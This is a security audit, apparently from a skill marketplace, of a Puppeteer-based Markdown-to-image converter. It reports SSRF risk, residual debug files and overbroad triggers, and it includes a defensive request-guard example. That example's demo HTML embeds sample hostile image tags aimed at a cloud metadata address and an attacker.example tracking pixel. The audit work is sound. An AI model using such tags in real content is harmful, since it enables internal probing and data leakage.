
Security audit

auto-md2img

Security checks across malware telemetry and agentic risk

Overview

This is a real Markdown-to-image converter, but it needs review because it can render untrusted Markdown in a browser, make outbound requests, and leave user content on disk more broadly than its privacy claims suggest.

Install only if you are comfortable with a local Node/Puppeteer tool processing your Markdown. Avoid using it on secrets, private documents, or attacker-supplied Markdown unless network access is sandboxed or blocked. Avoid debug mode for sensitive content, choose a controlled output directory, and clean generated images, logs, and page files after use.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger Abuse: Overly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
Findings (8)

Description-Behavior Mismatch

Severity: Low
Confidence: 95%
Finding
The script writes artifacts beyond the requested image: a .log file is always created, and in debug mode it also writes the paginated intermediate Markdown files. Those files can carry sensitive Markdown content, file paths, stack traces, or metadata onto disk unexpectedly, which matters when the input contains secrets or when the output directory is shared with other users or processes.

Context-Inappropriate Capability

Severity: Medium
Confidence: 98%
Finding
Rendering untrusted Markdown through Puppeteer with page.setContent(..., { waitUntil: 'networkidle0' }) lets the browser fetch any remote resource referenced by the generated HTML (images, stylesheets, other embedded content) and waits for those fetches before rendering. Because the requests originate from the host running the tool, this enables SSRF-style requests, internal network probing, data exfiltration through request side effects (for example a query string carrying document content), and privacy leaks about the host environment processing the Markdown.

Context-Inappropriate Capability

Severity: Medium
Confidence: 98%
Finding
The final screenshot generation path also loads rendered Markdown into Puppeteer and waits for network idle, so any remote references in Markdown/HTML can trigger browser-initiated requests during image creation. In an automation or agent environment, this expands the attack surface from simple file conversion to outbound request capability against attacker-controlled or internal endpoints.
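The two findings above share one fix: intercept every request the page makes before rendering and abort anything that would leave the process, then stop waiting on network idle so aborted requests cannot stall the screenshot. The block below is an added example written for this audit, not auto-md2img's own code. It uses Puppeteer's documented page API (setRequestInterception, on('request'), request.url()/abort()/continue(), setJavaScriptEnabled, setContent, screenshot); the policy, the renderGuarded function and the FakePage stand-in that lets the example run without a browser are assumptions for illustration. The HTML in demo() is constructed to look like what a Markdown renderer would emit for attacker-supplied input.

```javascript
// Added example: a request guard for Puppeteer-based Markdown rendering.
// Not auto-md2img's code; the policy and helper names are hypothetical.

// Only schemes that never leave the renderer process are allowed.
const ALLOWED_SCHEMES = new Set(['data:', 'about:', 'blob:']);

// Deny-by-default policy: anything unparseable or not in the allow set is blocked,
// so http(s), file, ws and cloud metadata endpoints are all refused.
function isAllowedRequest(url) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch (e) {
    return false;
  }
  return ALLOWED_SCHEMES.has(parsed.protocol);
}

// Install the guard on a Puppeteer page. Returns the list of blocked URLs so the
// caller can report what the Markdown tried to reach (useful as a detection signal).
async function installRequestGuard(page) {
  const blocked = [];
  await page.setRequestInterception(true);
  page.on('request', (request) => {
    const url = request.url();
    if (isAllowedRequest(url)) {
      request.continue();
    } else {
      blocked.push(url);
      request.abort('blockedbyclient');
    }
  });
  return blocked;
}

// Hardened counterpart of setContent(html, { waitUntil: 'networkidle0' }):
// no script execution, no outbound requests, and no waiting on network idle.
async function renderGuarded(page, html) {
  await page.setJavaScriptEnabled(false); // static Markdown output needs no script
  const blocked = await installRequestGuard(page);
  await page.setContent(html, { waitUntil: 'domcontentloaded' });
  const png = await page.screenshot({ fullPage: true });
  return { png, blocked };
}

// Stand-in for a Puppeteer page so the example runs offline. It emits one request
// per src= attribute, which is what images, scripts and iframes trigger on load.
class FakePage {
  constructor() { this.handlers = {}; this.jsEnabled = true; this.outcomes = []; }
  async setRequestInterception(on) { this.intercept = on; }
  async setJavaScriptEnabled(on) { this.jsEnabled = on; }
  on(event, handler) {
    this.handlers[event] = this.handlers[event] || [];
    this.handlers[event].push(handler);
  }
  async setContent(html, options) {
    this.waitUntil = options && options.waitUntil;
    for (const m of html.matchAll(/src=["']([^"']+)["']/g)) {
      const url = m[1];
      const request = {
        url: () => url,
        continue: () => this.outcomes.push(['continue', url]),
        abort: (code) => this.outcomes.push(['abort', url, code]),
      };
      for (const h of this.handlers.request || []) h(request);
    }
  }
  async screenshot() { return Buffer.from('png-bytes'); }
}

// Constructed sample: HTML as a Markdown renderer might produce for hostile input.
async function demo() {
  const html = [
    '<p>quarterly numbers</p>',
    '<img src="http://169.254.169.254/latest/meta-data/">',
    '<img src="https://attacker.example/px.gif?h=corp-laptop">',
    '<img src="data:image/png;base64,iVBORw0KGgo=">',
  ].join('\n');
  const page = new FakePage();
  const result = await renderGuarded(page, html);
  return {
    blocked: result.blocked,
    waitUntil: page.waitUntil,
    jsEnabled: page.jsEnabled,
    outcomes: page.outcomes,
  };
}

demo().then((r) => console.log('blocked:', r.blocked));
```

Against a real browser, swap FakePage for the page returned by browser.newPage(); the guard and renderGuarded do not change. Reporting the blocked list alongside the image is worth keeping: a document that tries to reach a link-local metadata address or an external tracking pixel is itself a finding.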

Vague Triggers

Severity: Medium
Confidence: 90%
Finding
The trigger scope is described so broadly that the skill may activate for many ordinary Markdown-like replies rather than only when image rendering is necessary. In an agent setting, overbroad triggering can cause unintended file creation, browser execution, and content transformation, increasing attack surface and creating opportunities for misuse or denial-of-service through unnecessary conversions.

Natural-Language Policy Violations

Severity: Medium
Confidence: 87%
Finding
The instruction to use the skill whenever the user inputs Chinese creates a locale-based auto-trigger without any user-choice or policy constraint. That can cause unnecessary rendering of user content into images solely based on language, which is risky in multi-lingual environments and may bypass expected text handling, transparency, or accessibility behaviors.

Vague Triggers

Severity: Medium
Confidence: 90%
Finding
The trigger scenarios are defined so broadly that the skill may activate for nearly any response involving formatted or long text, even when image conversion is unnecessary. Overly broad activation can cause unintended processing of user content, unnecessary file creation, and accidental exposure of sensitive Markdown through image generation or debug artifacts.

Missing User Warnings

Severity: Medium
Confidence: 95%
Finding
The skill documents a debug mode that saves intermediate HTML and raw pagination content to disk, but it does not prominently warn that this may persist sensitive user content outside the normal response flow. In systems handling private chats, credentials, or internal documents, this creates a confidentiality risk through residual files and logs.

Natural-Language Policy Violations

Severity: Medium
Confidence: 87%
Finding
The instruction to use a Chinese-specific skill whenever the user inputs Chinese imposes routing behavior without user consent or clear necessity. This can cause inappropriate handling, unexpected data flow to another skill, and reduced transparency about how user content is processed.

VirusTotal

64/64 vendors flagged this skill as clean.
